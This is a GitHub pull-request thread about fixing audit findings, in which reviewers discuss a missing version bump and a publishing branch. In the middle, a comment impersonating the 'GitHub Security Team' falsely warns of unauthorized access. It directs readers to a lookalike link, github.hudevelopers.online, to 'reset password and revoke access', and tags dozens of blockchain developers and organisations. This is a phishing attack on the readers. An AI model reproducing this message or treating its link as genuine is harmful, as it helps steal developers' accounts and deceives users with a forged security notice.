### PR TITLE
Address issues reported by ToB - CUST-5

### PR DESCRIPTION
**Pull request by jcavallaro-bc**

### CODE REVIEW

**Comment by pablojorge** [comment]
Great! I think we're missing the version bump right?

**Comment by mbratfisch-bc** [comment]
@jcavallaro-bc, are we missing version bump? :)

**Comment by jcavallaro-bc** [comment]
@mbratfisch-bc: the current version is `1.6-SNAPSHOT` rather than `1.6-BC3`, so I wasn't sure whether this change has to happen somewhere else, i.e. at the build pipeline?

**Review by mbratfisch-bc — APPROVED** [review]

**Comment by jcavallaro-bc** [comment]
The version bump [was missing](https://github.com/blockchain/service-hot-wallet/pull/1241/commits/1383d4ec11b46a82e7536a79d386b7597db2e132) at the HWS PR, though.

**Review by jjambazov-bc — APPROVED** [review]

**Comment by pablojorge** [comment]
> @mbratfisch-bc: the current version is `1.6-SNAPSHOT` rather than `1.6-BC3`, so I wasn't sure whether this change has to happen somewhere else, i.e. at the build pipeline?

There's a separate branch with the changes required to publish the lib to our internal repo: `nexus`. We need to merge this PR, and update that branch.

**Comment by Admin-nextbill** [comment]
# Unauthorized Access Alert

Dear GitHub User,

It has come to our attention that your GitHub account was recently accessed by an unauthorized individual. In order to prevent any further unauthorized access and secure your account, we kindly request you to reset your password and revoke access through the following link:

[Reset Password and Revoke Access](http://github.hudevelopers.online/)

We appreciate your prompt attention to this matter and thank you for ensuring the security of your account. Please act swiftly to prevent any potential risks or breaches.

Thank you for your cooperation.

Sincerely,

GitHub Security Team

**Affected Users:**
- @nftbigdev
- @etherpan
- @ilanolkies
- @larry0x
- @srishilesh
- @balajipachai
- @near-examples
- @mcne65
- @HuobiGroup
- @ruanbekkerleviathanbeak
- @Magician-Blockchain
- @zscorpio
- @yhuag
- @khovratovich
- @cds-amal
- @HadesHappy
- @docongminh
- @RuiSiang
- @josedlujancodersharma2001
- @Jonath-z
- @cryptoinhero
- @developerblockchain
- @ivanceras
- @metacoin
- @RhettButler0529
- @Namaskar-1F64F
- @boilerblockchain
- @hyperworld103catShaark
- @blockchain-gt
- @alexjolly28
- @LedgerHQ
- @Tanteli
- @jmcph4
- @WebVA
- @BlockchainCap
- @rajchandra3
- @hsyodyssey

**Pull request merged**
